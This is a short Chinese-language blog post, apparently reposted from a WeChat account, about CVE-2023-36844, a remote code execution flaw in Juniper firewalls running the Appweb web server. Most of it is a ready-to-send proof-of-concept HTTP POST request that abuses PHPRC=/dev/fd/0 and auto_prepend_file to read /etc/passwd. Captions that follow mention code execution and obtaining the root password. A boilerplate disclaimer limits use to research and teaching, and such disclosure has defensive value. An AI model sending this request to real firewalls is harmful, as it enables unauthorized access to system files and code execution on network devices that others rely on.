Juniper Firewalls存在远程代码执行(CVE-2023-36844),其使用 Appweb Web 服务器。当 Appweb 调用 CGI 脚本时,它会传递各种环境变量和参数,以便脚本可以访问用户的 HTTP 请求。HTTP 请求的正文通过标准输入传递。受影响的防火墙运行 FreeBSD, 每个 FreeBSD 进程都可以通过打开 /dev/fd/0 来访问它们的 stdin。通过发送 HTTP 请求,我们能够向系统引入一个"文件"。poc如下
POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 打码
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Dest: script
Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"
Content-Length: 31
auto_prepend_file="/etc/passwd"
远程包含执行代码
获取root密码
工具检测
原文始发于微信公众号(Enginge):Juniper Firewalls CVE-2023-36844
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论